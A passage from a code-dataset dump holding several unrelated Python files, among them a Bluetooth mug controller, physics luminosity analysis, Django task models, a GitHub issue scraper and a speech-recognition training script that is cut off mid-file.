Battery\n # self.timer = QTimer()\n\n # Execute function every 3 seconds\n # TO-DO: Must decouple the calling of this function from the connection\n # while self.keepConnectionAlive:\n # We stay in here to keep the client alive\n # once keepConnectionAlive is set to false\n # the client will also disconnect automatically\n while self.keepConnectionAlive == True:\n await asyncio.sleep(1)\n # await asyncio.sleep(5)\n # print(\".\")\n # await asyncio.gather(\n # self.getCurrentBattery(),\n # self.getCurrentTemp(),\n # self.getTargetTemp(),\n # )\n # await asyncio.sleep(3)\n return\n except Exception as exc:\n # self.connectionChanged.emit(False)\n print(\"Error: {}\".format(exc))\n\n # # function to get the current temp from the async loop.\n # def fetchCurrentTemperature(self):\n # if self.connectedClient is not None:\n # asyncio.ensure_future(self.getCurrentTemp())\n\n # # function to get the current charge percentage from the async loop.\n # def fetchCurrentBattery(self):\n # if self.connectedClient is not None:\n # asyncio.ensure_future(self.getCurrentBattery())\n\n # Get the current temp\n async def getCurrentTemp(self):\n if await self.connectedClient.is_connected():\n currentTemp = await self.connectedClient.read_gatt_char(\n UUIDS[\"current_temp\"]\n )\n CurrentDegree = (\n float(int.from_bytes(currentTemp, byteorder=\"little\", signed=False))\n * 0.01\n )\n # Unit conversion\n if self.unit == \"F\":\n CurrentDegree = (CurrentDegree * 1.8) + 32\n CurrentDegree = round(CurrentDegree, 1)\n self.current_temp = CurrentDegree\n logging.info(\"Temp: %s\", self.current_temp)\n # await asyncio.sleep(3)\n # print(CurrentDegree)\n # Send UI Signal\n # 
self.getDegree.emit(float(CurrentDegree))\n else:\n # self.connectionChanged.emit(False)\n print(\"not connected\")\n\n async def getCurrentBattery(self):\n if await self.connectedClient.is_connected():\n currentBat = await self.connectedClient.read_gatt_char(UUIDS[\"current_bat\"])\n logging.info(\"Battery: %s\", float(currentBat[0]))\n # await asyncio.sleep(3)\n # Send UI Signal\n # self.getBattery.emit(float(currentBat[0]))\n else:\n # self.connectionChanged.emit(False)\n print(\"not connected\")\n\n async def getTargetTemp(self):\n if await self.connectedClient.is_connected():\n currentTemp = await self.connectedClient.read_gatt_char(\n UUIDS[\"target_temp\"]\n )\n TargetDegree = (\n float(int.from_bytes(currentTemp, byteorder=\"little\", signed=False))\n * 0.01\n )\n if self.unit == \"F\":\n TargetDegree = (TargetDegree * 1.8) + 32\n TargetDegree = round(TargetDegree, 1)\n logging.info(\"Temp: %s\", TargetDegree)\n else:\n # self.connectionChanged.emit(False)\n print(\"not connected\")\n\n async def update_values(self):\n while True:\n try:\n await self.getCurrentBattery()\n await self.getCurrentTemp()\n await self.getTargetTemp()\n await asyncio.sleep(3)\n except:\n print(\"Not connected, trying again in 10 seconds\")\n await asyncio.sleep(10)\n\n async def setToTemp(self, temp: float):\n while True:\n try:\n print(\"Trying\")\n if await self.connectedClient.is_connected():\n if self.unit == \"F\":\n temp = (temp - 32) / 1.8\n print(temp)\n print(\"try setting the target temperature\")\n convert_temp = int(temp * 1000)\n print(convert_temp)\n newtarget = bytearray(convert_temp.to_bytes(2, \"little\"))\n await self.connectedClient.write_gatt_char(\n UUIDS[\"target_temp\"], newtarget, False\n )\n return\n # Send UI Signal\n # self.getDegree.emit(float(temp * 0.01))\n\n else:\n # self.connectionChanged.emit(False)\n print(\"not connected\")\n except Exception as err:\n print(\"sleep\")\n print(err)\n await asyncio.sleep(5)\n","sub_path":"mug/mug.py","file_name":"mug.py","file_ext":"py","file_size_in_byte":7577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"483883424","text":"\"\"\"\nAPP-Q2:\n\n\"\"\"\n\nimport random\nimport matplotlib.pyplot as plt\n \nimport graph_degree_dist as dist\n\ndef make_er_graph(num_nodes, prob):\n\ter_graph = dict()\n\tnodes = set([i for i in xrange(num_nodes)])\n\tfor src in xrange(num_nodes):\n\t\ter_graph[src] = []\n\t\tdest_candidates = set(nodes)\n\t\tdest_candidates.remove(src)\n\t\tfor dest in dest_candidates:\n\t\t\tif random.random() < prob:\n\t\t\t\ter_graph[src].append(dest)\n\treturn er_graph\n\ner_graph = make_er_graph(1000, 0.05)\nin_degree_dist = dist.in_degree_distribution(er_graph)\ndist.plot_dist(in_degree_dist, 'bo',\n\t'In-degree (log scale)',\n\t'Probability (log scale)',\n\t'In-degree distribution of ER directed graph')","sub_path":"week1/app/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"465312776","text":"\"\"\"\nproblem_010\n\n조합을 나타내는 식을 함수로 만들어보세요.\n\n팩토리얼 함수를 이용하여도 좋습니다.\n\"\"\"\n\ndef my_combination(a,b):\n \n if a < b:\n return False\n \n a_b = a - b\n \n for a_i in range(1, a):\n a *= a_i\n for b_i in range(1, b):\n b *= b_i\n for ab_i in range(1, a_b):\n a_b *= ab_i\n\n return int(a / (a_b * b))\n\nprint(my_combination(5,3))","sub_path":"algorithm/stud_group/problem_010.py","file_name":"problem_010.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"105209892","text":"import sys\nfrom collections import defaultdict\nfrom ROOT import TGraph, TVectorF, TCanvas, TH1F, kRed\nfrom JMTucker.Tools.ROOTTools import *\nfrom itertools import izip\nimport random\nfrom FWCore.PythonUtilities import LumiList\n\nheader = ['Run:Fill', 'LS', 'UTCTime', 'Beam Status', 'E(GeV)', 'Del(/nb)', 'Rec(/nb)', 'avgPU']\nps = plot_saver('plots_lumibyls_V3', size=(600,600))\n\ninfo = ()\n\ni = 0\n\nthis_fill = 0\nthis_run = 0\nthis_fill_rec = []\nthis_fill_apu = []\nthis_run_pos = []\n\nlumis = []\npileups = []\ntimes = []\nfill = 0\n\nsum_luminosity = 0\nsum_luminosity2 = 0\nmax_ls = 167.147\nrandom.seed()\n\nlluminosity = []\nlpileup = []\nllumisec = []\nlrun = []\n\n# All\nh_pileup = TH1F(\"h_pileup\",\"h_pileup\",100,0,50)\nh_w_pileup = TH1F(\"h_w_pileup\",\"h_w_pileup\",100,0,50)\nh_w_pileup.Sumw2()\n\nh_luminosity = TH1F(\"h_luminosity\",\"h_luminosity\",200,0,170)\nh_w_luminosity = TH1F(\"h_w_luminosity\",\"h_w_luminosity\",200,0,170)\nh_w_luminosity.Sumw2()\n\n# Random Pick\nh_pileup_picked = TH1F(\"h_pileup_picked\",\"h_pileup_picked\",100,0,50)\nh_w_pileup_picked = TH1F(\"h_w_pileup_picked\",\"h_w_pileup_picked\",100,0,50)\nh_w_pileup_picked.Sumw2()\n\n# Shaped distribution\nh_shaped_pileup = TH1F(\"h_shaped_pileup\",\"h_shaped_pileup\",100,0,50)\nh_w_shaped_pileup = TH1F(\"h_w_shaped_pileup\",\"h_w_shaped_pileup\",100,0,50)\nh_w_shaped_pileup.Sumw2()\n\nh_shaped_luminosity = TH1F(\"h_shaped_luminosity\",\"h_shaped_luminosity\",200,0,170)\nh_w_shaped_luminosity = TH1F(\"h_w_shaped_luminosity\",\"h_w_shaped_luminosity\",200,0,170)\nh_w_shaped_luminosity.Sumw2()\n\nfor line in open(sys.argv[1]):\n line = line.split('|')\n #print len(line), line\n if len(line) != 10:\n continue\n line = [x.strip() for x in line if x.strip()]\n\n run_fill, ls, time, status, energy, delivered, recorded, avgpu = line\n \n if fill != \"Fill\":\n fill_m1 = int(fill)\n \n try:\n run, fill = run_fill.split(':')\n run = int(run)\n fill = int(fill)\n ls = int(ls.split(':')[0])\n recorded = float(recorded)\n avgpu = float(avgpu)\n except ValueError:\n assert line == header\n continue\n \n #print '%i,%i,%i,%s,%g,%g' % (i,fill,run,time,recorded,avgpu)\n\n #print \"lumi=\",ls,\" pileup=\",avgpu\n \n assert fill >= this_fill\n assert run >= this_run\n\n# if avgpu < 4:\n # print \"Fill with small pileup=\",fill\n # print \"Run with small pileup=\",run\n\n lluminosity.append(recorded)\n lpileup.append(avgpu)\n llumisec.append(ls)\n lrun.append(run)\n \n if fill_m1 != fill:\n i = 0\n Luminosity = TVectorF(221878)\n Pileup = TVectorF(221878)\n Time = TVectorF(221878)\n lumis.append(Luminosity)\n pileups.append(Pileup)\n times.append(Time)\n\n #print i,fill_m1,fill\n \n Luminosity[i] = recorded\n Pileup[i] = avgpu\n zeit = time.split(\" \")[1] # FIX TIME\n Zeit = int(int(zeit.split(\":\")[0])*3600+int(zeit.split(\":\")[1])*60+int(zeit.split(\":\")[2]))\n Time[i] = Zeit\n i += 1\n\nfor rec,pu in izip(lluminosity,lpileup):\n h_pileup.Fill(pu)\n h_luminosity.Fill(rec)\n h_w_pileup.Fill(pu,rec)\n\nlumi_list = LumiList.LumiList('Cert_190456-208686_8TeV_22Jan2013ReReco_Collisions12_JSON.txt')\nreduced_lumi_list = LumiList.LumiList()\n\nwhile sum_luminosity2 < 1000000.:\n x = random.randint(0,221878)\n sum_luminosity2 += lluminosity[x]\n h_pileup_picked.Fill(lpileup[x])\n h_w_pileup_picked.Fill(lpileup[x],lluminosity[x])\n if lumi_list.contains(lrun[x],llumisec[x]):\n reduced_lumi_list = reduced_lumi_list + 
LumiList.LumiList('',[[lrun[x],llumisec[x]]])\n\nreduced_lumi_list.writeJSON('picked_data_JSON.txt')\n \n \nh_pileup.DrawNormalized()\nh_pileup_picked.SetLineColor(kRed)\nh_pileup_picked.DrawNormalized()\nh_pileup.DrawNormalized(\"same\")\nps.save(\"h_pileup_norm\")\n\nh_w_pileup_picked.SetLineColor(kRed)\nh_w_pileup_picked.DrawNormalized()\nh_w_pileup.DrawNormalized(\"same\")\nps.save(\"h_w_pileup_norm\")\n\n \n#count=0\n#print \"How many fills? \",len(lumis),len(pileups),len(times)\n#for i,j,k in izip(lumis,pileups,times):\n# h1=TGraph(k,i)\n# h1.Draw(\"AP\")\n# ps.save(\"Lumi\"+str(count))\n# h2=TGraph(k,j)\n# h2.Draw(\"AP\")\n# ps.save(\"Pileup\"+str(count))\n# count +=1\n\n","sub_path":"MFVNeutralino/test/lumibyls.py","file_name":"lumibyls.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"149523948","text":"# Behnam Asadi \n# http://ros-developer.com\n# To see the function that we are working on visit:\n# http://ros-developer.com/2017/05/07/gradient-descent-method-for-finding-the-minimum/\n# or simply put the following latex code in a latex doc:\n# $$ z= -( 4 \\times e^{- ( (x-4)^2 +(y-4)^2 ) }+ 2 \\times e^{- ( (x-2)^2 +(y-2)^2 ) } )$$\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n\ndef objective_function(x,y):\n z=-( 4*np.exp(-(x-4)**2 - (y-4)**2)+2*np.exp(-(x-2)**2 - (y-2)**2) )\n return z\n\n\ndef f_prim(x,y):\n f_x=-( (-2)*(x-4)*4*np.exp(-(x-4)**2 - (y-4)**2) + (-2)*(x-2)*2*np.exp(-(x-2)**2 - (y-2)**2) )\n f_y=-( (-2)*(y-4)*4*np.exp(-(x-4)**2 - (y-4)**2) + (-2)*(y-2)*2*np.exp(-(x-2)**2 - (y-2)**2) )\n return [f_x,f_y]\n\n \nx = np.linspace(-2,10,200)\ny = np.linspace(-2,10,200)\n\nX, Y = np.meshgrid(x,y)\n\nZ=objective_function(X,Y)\n\n\n#Make a 3D plot\nfig = plt.figure()\nax = fig.gca(projection='3d')\nax.plot_surface(X, Y, Z,linewidth=0,cmap='coolwarm')\n\nax.set_xlabel('X axis')\nax.set_ylabel('Y axis')\nax.set_zlabel('Z axis')\n\n\nX_old=-2\nY_old=0\n\n\n# The starts point for the algorithm:\nX_new=4\nY_new=2.2\n\n# step size\nepsilon=0.1\n\n# stop criteria\nprecision = 0.00001\n\n\n\nx_path_to_max=[]\ny_path_to_max=[]\nz_path_to_max=[]\n\n\n\nwhile np.sqrt( (X_new-X_old)**2 + (Y_new-Y_old)**2 ) > precision:\n X_old=X_new\n Y_old=Y_new\n \n #[X_new,Y_new]=f_prim(X_new,Y_new)\n #print f_prim(X_new,Y_new)\n x_path_to_max.append(X_new )\n y_path_to_max.append(Y_new )\n z=objective_function(X_new,Y_new)\n z_path_to_max.append(z)\n \n ret_val=f_prim(X_old,Y_old)\n X_new=X_old-epsilon*ret_val[0]\n Y_new=Y_old-epsilon*ret_val[1]\n# print X_new\n# print Y_new\n \n \n\nline1=plt.plot(x_path_to_max,y_path_to_max,z_path_to_max)\nplt.setp(line1,color='g',linewidth=0.5)\n\n\n#print X_new\n#print Y_new\nplt.show()\n\n\n","sub_path":"Machine_Learning_Univ_Course_(2017Fall)/Extra_hw/Extra_hw02/gradDescent/grad_desc9.py","file_name":"grad_desc9.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"240655038","text":"from django.db import models\nfrom django.core.urlresolvers import reverse\nfrom django.utils.http import urlquote\nfrom django.utils.timesince import timesince, timeuntil\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom core.models import Slugged, base_concrete_model, DateStamp\n\nfrom projects.models import Project\nimport reversion\n\ndef get_sentinel_category():\n return TaskCategory.objects.get_or_create(title='Deleted')[0]\n\nclass Task(Slugged):\n project = models.ForeignKey(Project)\n category = models.ForeignKey('TaskCategory', blank=True, null=True,\n on_delete=models.SET(get_sentinel_category))\n projected_completion_date = models.DateField(_(\"Projected Completion Date\"),\n blank=True, null=True)\n completion_date = models.DateField(_(\"Actual Completion Date\"),\n blank=True, null=True)\n description = models.TextField(blank=True)\n expense = models.IntegerField(blank=True)\n price = models.IntegerField(blank=True, verbose_name=_('Markup'))\n\n class Meta:\n order_with_respect_to = 'project'\n\n def save(self, *args, **kwargs):\n if not self.category:\n self.category = get_sentinel_category()\n super(Task, self).save(*args, **kwargs)\n\n\n def get_absolute_url(self):\n return reverse('tasks:task-detail', kwargs={'pk': self.pk})\n\n def get_update_url(self):\n return reverse('tasks:task-update', kwargs={'pk': self.pk})\n\n def due_date_until(self):\n if self.projected_completion_date:\n return timeuntil(self.projected_completion_date)\n\n def due_date_since(self):\n if self.projected_completion_date:\n return timesince(self.projected_completion_date)\n\n def get_status(self):\n if self.project.start_time:\n if self.completion_date:\n result = 2\n else:\n result = 1\n else:\n result = 0\n return result\n\n def get_project_category_totals(self):\n result_dict = {}\n all_categories = TaskCategory.objects.all()\n all_tasks = Task.objects.filter(project=self.project)\n all_categories = all_categories.order_by('order')\n for cat in all_categories:\n cat_tasks = all_tasks.filter(category=cat)\n if cat_tasks:\n cat_exp_total = sum(cat_tasks.values_list('expense', flat=True))\n cat_price_total = sum(cat_tasks.values_list('price', flat=True))\n result_dict[cat.slug] = {\n 'id': cat.id,\n 'title': cat.title,\n 'expense': cat_exp_total,\n 'price': cat_price_total,\n 'total': sum([cat_exp_total, cat_price_total]),\n 'tasks': cat_tasks\n }\n return result_dict\n\n due_date_since.short_description = _(\"Late by\")\n due_date_until.short_description = _(\"Due in\")\nreversion.register(Task)\n\n\nclass TaskCategory(Slugged):\n parent = models.ForeignKey(\"TaskCategory\", blank=True, null=True,\n related_name=\"children\", on_delete=models.SET_NULL)\n ascendants = models.CharField(editable=False, max_length=100, null=True)\n order = models.IntegerField(blank=True, null=True)\n description = models.TextField(blank=True)\n\n class Meta:\n ordering = ('_order', 'order', 'ascendants')\n order_with_respect_to = 'parent'\n\n def save(self, *args, **kwargs):\n\n if self.parent is None:\n self._order = self.order\n\n if self.ascendants:\n if not self.id in [int(ascendant) for ascendant in self.ascendants.split(',')[:-1]]:\n if self.update_descendants():\n super(TaskCategory, self).save(*args, **kwargs)\n else:\n #print 'error: self id in ascendants'\n pass\n else:\n super(TaskCategory, self).save(*args, **kwargs)\n self.update_descendants()\n\n def update_descendants(self):\n current_ascendants = self.ascendants\n #print 'current: ' + 
str(current_ascendants)\n\n ascendants = [str(self.id)]\n parent = self.parent\n while parent is not None and parent is not self:\n ascendants.insert(0, str(parent.id))\n if parent.parent:\n parent = parent.parent\n else:\n #the while condition will set parent to None and we cant validate it so we end the loop before this\n #while the parent is not None\n break\n if parent == self:\n break\n\n if parent != self or parent is None:\n #print 'parent safe'\n ascendants = \",\".join(ascendants)\n self.ascendants = ascendants\n\n if ascendants != current_ascendants or ascendants is None:\n super(TaskCategory, self).save(update_fields=['ascendants'])\n #print 'new : ' + str(self.ascendants)\n\n children = self.children.all()\n if children:\n for child in children:\n child.update_descendants()\n return True\n else:\n return False\n\n\n def get_update_url(self):\n return reverse('tasks:task-category-update', kwargs={'pk': self.pk})\n\n def get_project_category_price(self, project):\n total = 0\n for p in project.task_set.filter(category=self):\n total += p.price\n return total\n\n def get_project_category_expense(self, project):\n total = 0\n for p in project.task_set.filter(category=self):\n total += p.expense\n return total\n\nreversion.register(TaskCategory, follow=['task_set'], exclude=[\"created, modified\"])\n\n\nclass CategoryBundle(Slugged):\n categories = models.ManyToManyField(TaskCategory, null=True, blank=True, related_name='bundles')\n\n def get_update_url(self):\n return reverse('tasks:bundle-update', kwargs={'pk': self.pk})\n","sub_path":"cpm/tasks/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
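TaskCategory.update_descendants maintains a comma-separated materialized path of ancestor ids (self included), so subtree checks reduce to string operations. A framework-free sketch of the same idea, with a hypothetical Node class standing in for the model:

class Node:
    def __init__(self, node_id, parent=None):
        self.id, self.parent = node_id, parent
        # ancestors' ids plus our own, root first
        self.path = (parent.path + ',' if parent else '') + str(node_id)

root = Node(1)
child = Node(2, root)
grandchild = Node(3, child)
assert grandchild.path == '1,2,3'
# subtree membership check: does the path start at root's id?
assert grandchild.path.split(',')[0] == str(root.id)

The model's save() additionally guards against a node appearing in its own ancestor list, which is the cycle check this sketch omits.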
+{"seq_id":"94830120","text":"\nimport unittest\nimport numpy as np\n\nfrom use_generator import Generator\nfrom template import Template\nfrom molecules import Water, Atom, Property, Molecule, Rotator\n\nclass WaterTest( unittest.TestCase ):\n\n def setUp(self):\n self.ut_alpha = np.random.random( (6, ) )\n self.ut_beat = np.random.random( (10, ) )\n\n self.g = Generator()\n self.w = self.g.get_mol( center = np.random.uniform( -10, 10, [3] ), mol = \"water\" )\n\n self.t1 = np.random.uniform( 0, np.pi/2 )\n self.t2 = np.random.uniform( 0, np.pi )\n self.t3 = np.random.uniform( 0, np.pi/2 )\n\n\n def test_negative_y_get_euler(self):\n\n w = self.g.get_mol( center = [0,0,0], mol = \"water\" )\n\n t1 = 0\n t2 = 0\n t3 = 0\n\n t1 = np.pi/2\n #t2 = np.pi/2\n #t3 = np.pi/2\n\n #t1, t2, t3 = w.get_euler()\n Rz1 = Rotator.get_Rz( t1 )\n #Ry = Molecule.get_Ry_inv( t2 )\n #Rz2 = Molecule.get_Rz( t3 )\n\n\n\n #assert isinstance( w, )\n\n\n\n def eq(self, a, b):\n np.testing.assert_almost_equal( a, b, decimal = 3)\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/test/test_operators.py","file_name":"test_operators.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"127724362","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.6-i386/egg/silme/io/sqlite.py\n# Compiled at: 2010-06-12 17:55:55\nimport silme.io\nfrom silme.io.clients import IOClient, DBClient\nfrom silme.core import L10nPackage, L10nObject, EntityList, Object, Entity\nimport os\nfrom pysqlite2 import dbapi2 as sqlite\n\ndef register(Manager):\n Manager.register(SQLiteClient)\n\n\nclass SQLiteClient(DBClient):\n name = 'sqlite'\n desc = 'SQLite reader/writer'\n type = IOClient.__name__\n\n @classmethod\n def matches_path(cls, path):\n \"\"\"\n tests if the ioclient should be used for this type of path\n Matches any sqlite:\n \"\"\"\n return path.startswith('sqlite:')\n\n @classmethod\n def get_entitylist(cls, path, source=False, code='default', parser=None):\n entityList = EntityList()\n (path, table) = cls._explode_path(path)\n con = cls._connected()\n if not con:\n cls._connect(path)\n cursor = cls.connection.cursor()\n cursor.execute('SELECT * FROM ' + table)\n for row in cursor:\n entitylist.add_entity(Entity(row[0], row[1]))\n\n cursor.close()\n if not con:\n cls._close()\n return entitylist\n\n @classmethod\n def get_l10npackage(cls, path, load_objects=True):\n l10npackage = L10nPackage()\n cls._connect(path)\n l10npackage.id = os.path.basename(path)\n l10npackage.objects['L10nTable'] = L10nObject(cls.build_entitylist(path, 'L10nTable'))\n cls._close()\n return l10npackage\n\n @classmethod\n def _explode_path(cls, path):\n return (\n path, 'l10n')\n\n @classmethod\n def _connect(cls, path):\n cls.connection = sqlite.connect(path)\n\n def _close(cls):\n if cls._connected():\n cls.connection.close()\n cls.connection = None\n return\n\n def _connected():\n return bool(cls.connection)","sub_path":"pycfiles/silme-0.8.1-py2.5/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"451389628","text":"import urllib.request\nfrom bs4 import BeautifulSoup\n\nlist_sites = []\nnum = 58\n\nfor i in range(1, num):\n url = 'https://github.com/reek/anti-adblock-killer/issues?page=' + str(i) + '&q=is%3Aissue+is%3Aopen'\n with urllib.request.urlopen(url) as response:\n html = response.read()\n soup = BeautifulSoup(html, 'html.parser')\n #pretty_html = soup.prettify()\n #with open(str(i) + '.hmtl', 'w') as f:\n # f.write(pretty_html)\n all_links = soup.find_all(\"a\", class_=\"link-gray-dark no-underline h4 js-navigation-open\")\n for link in all_links:\n site = link.string.rstrip().lstrip()\n if site:\n #print(site)\n list_sites.append(site)\nprint(len(list_sites))\n\nwith open('reek.txt', 'w') as f:\n for site in list_sites:\n f.write(site + '\\n')\n","sub_path":"Code/reek_issues.py","file_name":"reek_issues.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"265085652","text":"#!/usr/bin/env python3\n\n# Copyright (c) 2020 Xiaomi Corporation (authors: Daniel Povey\n# Haowen Qiu\n# Fangjun Kuang)\n# 2021 University of Chinese Academy of Sciences (author: Han Zhu)\n# Apache 2.0\n\nimport argparse\nimport logging\nimport os\nimport sys\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import Dict, Optional\n\nimport k2\nimport numpy as np\nimport torch\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\nfrom torch import nn\nfrom torch.cuda.amp import GradScaler, autocast\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom torch.nn.utils import clip_grad_value_\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom lhotse.utils import fix_random_seed, nullcontext\nfrom snowfall.common import describe, str2bool\nfrom snowfall.common import load_checkpoint, save_checkpoint\nfrom snowfall.common import save_training_info\nfrom snowfall.common import setup_logger\nfrom snowfall.data.librispeech import LibriSpeechAsrDataModule\nfrom snowfall.dist import cleanup_dist\nfrom snowfall.dist import setup_dist\nfrom snowfall.lexicon import Lexicon\nfrom snowfall.models import AcousticModel\nfrom snowfall.models.conformer import Conformer\nfrom snowfall.models.contextnet import ContextNet\nfrom snowfall.models.tdnn_lstm import TdnnLstm1b # alignment model\nfrom snowfall.models.transformer import Noam, Transformer\nfrom snowfall.objectives import LFMMILoss, encode_supervisions\nfrom snowfall.training.diagnostics import measure_gradient_norms, optim_step_and_measure_param_change\nfrom snowfall.training.mmi_graph import MmiTrainingGraphCompiler\nfrom snowfall.training.mmi_graph import create_bigram_phone_lm\n\n\ndef get_objf(batch: Dict,\n model: AcousticModel,\n ali_model: Optional[AcousticModel],\n P: k2.Fsa,\n device: torch.device,\n graph_compiler: MmiTrainingGraphCompiler,\n use_pruned_intersect: bool,\n is_training: bool,\n is_update: bool,\n accum_grad: int = 1,\n den_scale: float = 1.0,\n att_rate: float = 0.0,\n tb_writer: Optional[SummaryWriter] = None,\n global_batch_idx_train: Optional[int] = None,\n optimizer: Optional[torch.optim.Optimizer] = None,\n scaler: GradScaler = None\n ):\n feature = batch['inputs']\n # at entry, feature is [N, T, C]\n feature = feature.permute(0, 2, 1) # now feature is [N, C, T]\n assert feature.ndim == 3\n feature = feature.to(device)\n\n supervisions = batch['supervisions']\n supervision_segments, texts = encode_supervisions(supervisions)\n\n loss_fn = LFMMILoss(\n graph_compiler=graph_compiler,\n P=P,\n den_scale=den_scale,\n use_pruned_intersect=use_pruned_intersect\n )\n\n grad_context = nullcontext if is_training else torch.no_grad\n\n with autocast(enabled=scaler.is_enabled()), grad_context():\n\n if att_rate == 0:\n # Note: Make TorchScript happy by making the supervision dict strictly\n # conform to type Dict[str, Tensor]\n # Using the attention decoder with TorchScript is currently unsupported,\n # we'll need to separate out the 'text' field from 'supervisions' first.\n del supervisions['text']\n\n nnet_output, encoder_memory, memory_mask = model(feature, supervisions)\n if att_rate != 0.0:\n att_loss = model.module.decoder_forward(encoder_memory, memory_mask, supervisions, graph_compiler)\n\n if (ali_model is not None and global_batch_idx_train is not None and\n global_batch_idx_train // accum_grad < 4000):\n with torch.no_grad():\n ali_model_output = ali_model(feature)\n # subsampling is done 
slightly differently, may be small length\n # differences.\n min_len = min(ali_model_output.shape[2], nnet_output.shape[2])\n # scale less than one so it will be encouraged\n # to mimic ali_model's output\n ali_model_scale = 500.0 / (global_batch_idx_train // accum_grad + 500)\n nnet_output = nnet_output.clone() # or log-softmax backprop will fail.\n nnet_output[:, :,:min_len] += ali_model_scale * ali_model_output[:, :,:min_len]\n\n # nnet_output is [N, C, T]\n nnet_output = nnet_output.permute(0, 2, 1) # now nnet_output is [N, T, C]\n\n mmi_loss, tot_frames, all_frames = loss_fn(nnet_output, texts, supervision_segments)\n\n if is_training:\n def maybe_log_gradients(tag: str):\n if tb_writer is not None and global_batch_idx_train is not None and global_batch_idx_train % 200 == 0:\n tb_writer.add_scalars(\n tag,\n measure_gradient_norms(model, norm='l1'),\n global_step=global_batch_idx_train\n )\n\n if att_rate != 0.0:\n loss = (- (1.0 - att_rate) * mmi_loss + att_rate * att_loss) / (len(texts) * accum_grad)\n else:\n loss = (-mmi_loss) / (len(texts) * accum_grad)\n scaler.scale(loss).backward()\n if is_update:\n maybe_log_gradients('train/grad_norms')\n scaler.unscale_(optimizer)\n clip_grad_value_(model.parameters(), 5.0)\n maybe_log_gradients('train/clipped_grad_norms')\n if tb_writer is not None and (global_batch_idx_train // accum_grad) % 200 == 0:\n # Once in a time we will perform a more costly diagnostic\n # to check the relative parameter change per minibatch.\n deltas = optim_step_and_measure_param_change(model, optimizer, scaler)\n tb_writer.add_scalars(\n 'train/relative_param_change_per_minibatch',\n deltas,\n global_step=global_batch_idx_train\n )\n else:\n scaler.step(optimizer)\n optimizer.zero_grad()\n scaler.update()\n\n ans = -mmi_loss.detach().cpu().item(), tot_frames.cpu().item(\n ), all_frames.cpu().item()\n return ans\n\n\ndef get_validation_objf(dataloader: torch.utils.data.DataLoader,\n model: AcousticModel,\n ali_model: Optional[AcousticModel],\n P: k2.Fsa,\n device: torch.device,\n graph_compiler: MmiTrainingGraphCompiler,\n use_pruned_intersect: bool,\n scaler: GradScaler,\n den_scale: float = 1,\n ):\n total_objf = 0.\n total_frames = 0. # for display only\n total_all_frames = 0. 
# all frames including those seqs that failed.\n\n model.eval()\n\n from torchaudio.datasets.utils import bg_iterator\n for batch_idx, batch in enumerate(bg_iterator(dataloader, 2)):\n objf, frames, all_frames = get_objf(\n batch=batch,\n model=model,\n ali_model=ali_model,\n P=P,\n device=device,\n graph_compiler=graph_compiler,\n use_pruned_intersect=use_pruned_intersect,\n is_training=False,\n is_update=False,\n den_scale=den_scale,\n scaler=scaler\n )\n total_objf += objf\n total_frames += frames\n total_all_frames += all_frames\n\n return total_objf, total_frames, total_all_frames\n\n\ndef train_one_epoch(dataloader: torch.utils.data.DataLoader,\n valid_dataloader: torch.utils.data.DataLoader,\n model: AcousticModel,\n ali_model: Optional[AcousticModel],\n P: k2.Fsa,\n device: torch.device,\n graph_compiler: MmiTrainingGraphCompiler,\n use_pruned_intersect: bool,\n optimizer: torch.optim.Optimizer,\n accum_grad: int,\n den_scale: float,\n att_rate: float,\n current_epoch: int,\n tb_writer: SummaryWriter,\n num_epochs: int,\n global_batch_idx_train: int,\n world_size: int,\n scaler: GradScaler\n ):\n \"\"\"One epoch training and validation.\n\n Args:\n dataloader: Training dataloader\n valid_dataloader: Validation dataloader\n model: Acoustic model to be trained\n P: An FSA representing the bigram phone LM\n device: Training device, torch.device(\"cpu\") or torch.device(\"cuda\", device_id)\n graph_compiler: MMI training graph compiler\n optimizer: Training optimizer\n accum_grad: Number of gradient accumulation\n den_scale: Denominator scale in mmi loss\n att_rate: Attention loss rate, final loss is att_rate * att_loss + (1-att_rate) * other_loss\n current_epoch: current training epoch, for logging only\n tb_writer: tensorboard SummaryWriter\n num_epochs: total number of training epochs, for logging only\n global_batch_idx_train: global training batch index before this epoch, for logging only\n\n Returns:\n A tuple of 3 scalar: (total_objf / total_frames, valid_average_objf, global_batch_idx_train)\n - `total_objf / total_frames` is the average training loss\n - `valid_average_objf` is the average validation loss\n - `global_batch_idx_train` is the global training batch index after this epoch\n \"\"\"\n total_objf, total_frames, total_all_frames = 0., 0., 0.\n valid_average_objf = float('inf')\n time_waiting_for_batch = 0\n forward_count = 0\n prev_timestamp = datetime.now()\n\n model.train()\n for batch_idx, batch in 